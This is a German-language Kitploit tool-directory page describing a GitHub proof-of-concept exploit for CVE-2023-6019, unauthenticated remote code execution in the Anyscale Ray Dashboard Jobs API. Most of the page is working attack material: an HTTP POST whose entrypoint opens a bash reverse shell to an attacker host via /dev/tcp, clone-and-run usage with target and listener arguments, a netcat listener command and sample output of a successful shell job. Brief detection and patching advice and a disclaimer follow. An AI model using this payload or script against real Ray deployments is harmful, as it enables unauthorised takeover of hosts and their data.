Skip to content
KitploitKITPLOIT
ToolsExploitsBlog
Log in
Einreichen
ToolsExploitsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2023-6019 — PoC-Exploit für CVE-2023-6019, der nicht authentifizierte Remote-Codeausführung im Anyscale Ray Dashboard über die Jobs-API ausnutzt. Liefert eine Reverse Shell auf anfälligen Ray-Instanzen (< 2.6.4). | Kitploit
Tools/GitHubGitHub/joaquinrrr/cve-2023-6019
SchwachstellenanalyseExploitationWebanwendungs-ExploitationPenetrationstestsCommand and ControlRemote-Access-Tool
GitHubjoaquinrrr/cve-2023-6019

CVE-2023-6019

PoC-Exploit für CVE-2023-6019, der nicht authentifizierte Remote-Codeausführung im Anyscale Ray Dashboard über die Jobs-API ausnutzt. Liefert eine Reverse Shell auf anfälligen Ray-Instanzen (< 2.6.4).

Repository anzeigen
621vor 3 MonatenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2023-6019 - Anyscale Ray Dashboard Nicht authentifizierte RCE

PoC-Exploit für CVE-2023-6019 — Remote Code Execution über die nicht authentifizierte Ray Dashboard Jobs API.
Erstellt von oguiii


Beschreibung

Anyscale Ray ist ein Open-Source-Framework für verteilte ML/AI-Workloads. Versionen vor 2.6.4 legen eine Job-Übermittlungs-API über das Ray Dashboard (Standardport 8265) ohne jegliche Authentifizierung offen, sodass ein nicht authentifizierter Angreifer beliebige Jobs einreichen und eine Remote Code Execution auf dem Host erreichen kann.

  • CVE: CVE-2023-6019
  • Schweregrad: Kritisch (CVSS 9.8)
  • Betroffene Versionen: Ray < 2.6.4
  • Behoben in: Ray 2.6.4
  • Angriffsvektor: Netzwerk (nicht authentifizierte HTTP-Anfrage)

Funktionsweise

Der Endpunkt /api/jobs/ akzeptiert ein JSON-Payload mit einem entrypoint-Feld, das als Shell-Befehl vom Ray-Worker-Prozess ausgeführt wird – keine Anmeldeinformationen erforderlich.

POST /api/jobs/ HTTP/1.1
Host: <target>:8265
Content-Type: application/json

{
  "entrypoint": "bash -c 'bash -i >& /dev/tcp/ATTACKER/PORT 0>&1'",
  "runtime_env": {},
  "job_id": null,
  "metadata": {}
}

Verwendung

git clone https://github.com/joaquinrrr/CVE-2023-6019
cd CVE-2023-6019
pip install requests
python3 CVE-2023-6019.py -t <TARGET_IP> -p <PORT> -l <LHOST> -lp <LPORT>

Argumente

FlagBeschreibungStandard
-tZiel-IP oder Hostnameerforderlich
-pRay Dashboard-Port8265
-lAngreifer-IP (Reverse Shell)erforderlich
-lpAngreifer-Port (Reverse Shell)erforderlich

Beispiel

# Listener starten
nc -lvnp 4444

# Exploit ausführen
python3 CVE-2023-6019.py -t 192.168.1.100 -p 8265 -l 192.168.1.10 -lp 4444

Erwartete Ausgabe

[*] Checking Ray version at 192.168.1.100:8265...
[*] Ray API version : 4
[*] Ray version     : 2.6.3
[+] VULNERABLE! Ray 2.6.3 is affected by CVE-2023-6019

[*] Target        : http://192.168.1.100:8265/api/jobs/
[*] Reverse shell : 192.168.1.10:4444
[*] Submitting job...

[+] Job submitted successfully!
[+] Job ID: raysubmit_Gztg89LZuTa8Jevc

[>] Make sure your listener is ready:
    nc -lvnp 4444

Erkennung

Suchen Sie in Ihren HTTP-Protokollen oder Ihrem Netzwerkverkehr nach unerwarteten POST-Anfragen an /api/jobs/ auf Port 8265.


Abhilfe

  • Aktualisieren Sie auf Ray >= 2.6.4
  • Schränken Sie den Zugriff auf den Ray Dashboard-Port (8265) über Firewall-Regeln ein
  • Setzen Sie das Ray Dashboard nicht öffentlichen Netzwerken aus

Referenzen

  • https://nvd.nist.gov/vuln/detail/CVE-2023-6019
  • https://www.anyscale.com/
  • https://github.com/ray-project/ray

Haftungsausschluss

Dieses Tool ist ausschließlich für autorisierte Penetrationstests und Bildungszwecke gedacht.
Der Autor übernimmt keine Verantwortung für Missbrauch oder Schäden, die durch dieses Tool verursacht werden.
Holen Sie vor dem Testen immer eine schriftliche Genehmigung ein.

Tool herunterladen